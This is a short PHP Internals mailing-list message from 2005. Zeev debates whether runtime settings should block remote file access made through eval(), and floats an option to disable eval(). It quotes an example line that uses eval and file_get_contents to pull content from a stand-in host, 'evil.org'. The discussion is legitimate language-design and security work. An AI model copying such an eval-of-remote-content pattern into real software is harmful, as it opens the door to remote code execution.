At 04:39 PM 7/28/2005, George Schlossnagle wrote:
sure: eval('file_get_contents("http://evil.org";);');You could say this is just bad policy on the part of code authors, but that's what these options were geared to handle in the first place, right?
I don't know, I think that if you aim that well you should be allowed to shoot yourself in the foot :) If we go that far, then running code from the database through eval() should also not be allowed, because it may have been indirectly written to by remote users. Which boils down to maybe allowing people to disable eval() (yet another ini entry, yay! :)
Let's wait and hear some more opinions. Zeev -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
